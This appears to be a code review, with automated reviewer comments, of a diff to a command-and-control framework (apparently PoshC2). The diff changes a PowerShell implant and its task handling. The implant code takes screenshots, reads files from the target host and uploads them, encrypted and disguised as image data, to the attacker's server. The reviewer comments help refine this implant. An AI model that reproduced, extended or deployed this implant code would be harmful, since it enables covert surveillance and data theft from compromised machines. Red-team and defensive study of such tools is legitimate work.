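Review bot: `py_implant_core = open("%s/PyImplant-Core.py" % FilesDirectory, 'r').read()` and the `PSImplant-Core.ps1` line below it leave the file objects to the garbage collector, whereas `with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:` a few lines up in the same hunk already shows the file's own idiom. `with open("%s/PyImplant-Core.py" % FilesDirectory, 'r') as f: py_implant_core = f.read()` (and the same shape for the PowerShell core) closes the handles deterministically. Because the template text now comes from disk and is still fed through `%`, any literal percent sign in either core file that is not written as `%%` will raise at implant-build time; a one-line comment above the two reads stating that requirement would save the next editor of those files a confusing failure. The method enclosing this hunk begins before it.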
@@ -729,9 +729,9 @@ def runcommand(command, randomuri):
 else:
 try:
- check_module_loaded("Implant-Core.ps1", randomuri)
+ check_module_loaded("Core.ps1", randomuri)
 except Exception as e:
- print ("Error loading Implant-Core.ps1: %s" % e)
+ print ("Error loading Core.ps1: %s" % e)
 run_autoloads(command, randomuri)
diff --git a/Modules/Implant-Core.ps1 b/Modules/Core.ps1
similarity index 96%
rename from Modules/Implant-Core.ps1
rename to Modules/Core.ps1
index ad44efb..980878c 100644
--- a/Modules/Implant-Core.ps1
+++ b/Modules/Core.ps1
@@ -392,6 +392,10 @@ Function Get-Screenshot
 $psloadedscreen = $null
 function Get-ScreenshotAllWindows {
+ param(
+ [string] $TaskId
+ )
+
 if ($psloadedscreen -ne "TRUE") {
 $script:psloadedscreen = "TRUE"
 $ps = "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"
@@ -409,11 +413,10 @@ function Get-ScreenshotAllWindows {
 $bitmap.save($msimage, "bmp")
 $b64 = [Convert]::ToBase64String($msimage.toarray())
 $bitmap.Dispose();
- $ReadCommand = "get-screenshot"
- $ReadCommand = Encrypt-String $key $ReadCommand
+ $eid = Encrypt-String $key $TaskId
 $send = Encrypt-String2 $key $b64
 $UploadBytes = getimgdata $send
- (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
+ (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
 } catch {}
 }
 $error.clear()
@@ -446,7 +449,8 @@ function Download-File
 {
 param (
- [string] $Source
+ [string] $Source,
+ [string] $TaskId
 )
 try {
 $fileName = Resolve-PathSafe $Source
@@ -475,20 +479,18 @@ function Download-File
 $preNumbers = ($ChunkedByte+$totalChunkByte)
 $readSize = $bufferSize;
 $chunkBytes = $str.ReadBytes($readSize);
- $ReadCommand = "download-file "+$fullNewname
- $ReadCommand = Encrypt-String $key $ReadCommand
+ $eid = Encrypt-String $key $TaskId
 $send = Encrypt-Bytes $key ($preNumbers+$chunkBytes)
 $UploadBytes = getimgdata $send
- (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
+ (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
 ++$Chunk
 } until (($size -= $bufferSize) -le 0);
 } catch {
- $Output = "ErrorCmd: " + $error[0]
- $ReadCommand = "Error downloading file "+$fullnewname
- $ReadCommand = Encrypt-String $key $ReadCommand
+ $Output = "ErrorDownload: " + $error[0]
+ $eid = Encrypt-String $key $TaskId
 $send = Encrypt-String2 $key $output
 $UploadBytes = getimgdata $send
- (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
+ (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
 }
 }
 function Posh-Delete
@@ -755,15 +757,17 @@ try {
 }
 }
 Function Get-Webpage {
- param ($url)
+ param (
+ [string] $url,
+ [string] $TaskId
+ )
 $file = (New-Object System.Net.Webclient).DownloadString($url)|Out-String
- $ReadCommand = "download-file web.html"
- $ReadCommand = Encrypt-String $key $ReadCommand
+ $eid = Encrypt-String $key $TaskId
 $bytes = [System.Text.Encoding]::UTF8.GetBytes($file)
 $base64 = [Convert]::ToBase64String($bytes)
 $Output = Encrypt-String2 $key $base64
 $UploadBytes = getimgdata $Output
- (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
+ (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
 }
 Function AutoMigrate {
 if (($p = Get-Process | ? {$_.id -eq $pid}).name -eq "powershell") {
diff --git a/OfflineReportGenerator.py b/OfflineReportGenerator.py
index 5a2351e..07b9e08 100644
--- a/OfflineReportGenerator.py
+++ b/OfflineReportGenerator.py
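Review bot: `[string] $TaskId` is added to Download-File here, and to Get-ScreenshotAllWindows in the `@@ -392` hunk above, as an optional parameter with no default and no validation; a caller that still invokes either function without the argument reaches `$eid = Encrypt-String $key $TaskId` with an empty string and the upload goes out carrying no task id to correlate against. Declaring it `[Parameter(Mandatory=$true)] [string] $TaskId` makes the omission fail at the call site instead of producing an unattributable result. The same applies to Get-Webpage in the `@@ -755` hunk below. The call sites are outside this diff, so whether any remain unconverted is not visible here.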
@@ -204,7 +204,7 @@ function SearchTask() { function tweakMarkup(){ // Add classes to columns - var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] tbl = document.getElementById("PoshTable"); ths = tbl.getElementsByTagName("th"); for( i=0; i'; td.onclick = toggleHide @@ -327,7 +327,7 @@ table { table tr th.randomuri { width: 15%; } - table tr th.prompt { + table tr th.user { width: 10%; } @@ -349,7 +349,7 @@ __________ .__. _________ ________ """ - if table == "CompletedTasks": + if table == "Tasks": HTMLPre += """ @@ -366,13 +366,13 @@ __________ .__. _________ ________ frame = pd.read_sql_query("SELECT * FROM %s" % table, conn) # encode the Output column - if table == "CompletedTasks": + if table == "Tasks": for index, row in frame.iterrows(): frame.loc[index, "Command"] = replace_tabs(cgi.escape(row["Command"])) frame.loc[index, "Output"] = replace_tabs(cgi.escape(row["Output"])) # convert the random uri to original hostname - if table == "CompletedTasks": + if table == "Tasks": framelen = frame['RandomURI'].count() for x in range(0, framelen): try: @@ -398,7 +398,7 @@ __________ .__. _________ ________ HTMLPost = HTMLPost.replace("RandomURI","RandomURI") HTMLPost = HTMLPost.replace("Command","Command") HTMLPost = HTMLPost.replace("Output","Output") - HTMLPost = HTMLPost.replace("Prompt","Prompt") + HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("ImplantID","ImplantID") HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("Hostname","Hostname") 
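Review bot: The new `var classes = ['id', 'Label', taskid', 'randomuri', ...` line keeps the pre-existing missing opening quote on `taskid'`, so as far as this rendering shows the JavaScript emitted into the offline report is a syntax error and `tweakMarkup()` never runs; the `'prompt'` to `'user'` rename on the same line was the moment to fix it. `'Label', 'taskid', 'randomuri',` is the intended text. HTML.py's live copy of the same array in its `@@ -209` hunk is quoted correctly; only its commented-out twin carries the same slip.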
@@ -422,7 +422,7 @@ tweakMarkup();
 output_file.close()
 print reportname
-generate_table("CompletedTasks")
+generate_table("Tasks")
 generate_table("C2Server")
 generate_table("Creds")
 generate_table("Implants")
diff --git a/Tasks.py b/Tasks.py
index 8749a4e..a5850ad 100644
--- a/Tasks.py
+++ b/Tasks.py
@@ -15,6 +15,7 @@ def newTask(path):
 if RandomURI in path and tasks:
 for a in tasks:
 command = a[2]
+ user_command = command
 hostinfo = DB.get_hostinfo(RandomURI)
 now = datetime.datetime.now()
 print Colours.YELLOW,""
@@ -47,11 +48,17 @@ def newTask(path):
 except Exception as e:
 print "Cannot find module, loadmodule is case sensitive!"
 print e
+ taskId = DB.insert_task(RandomURI, user_command, None)
+ if len(str(taskId)) > 5:
+ raise ValueError('Task ID is greater than 5 characters which is not supported.')
+ taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
+ command = taskIdStr + command
 if commands:
 commands += "!d-3dion@LD!-d" + command
 else:
 commands += command
 DB.del_newtasks(str(a[0]))
+
 if commands is not None:
 multicmd = "multicmd%s" % commands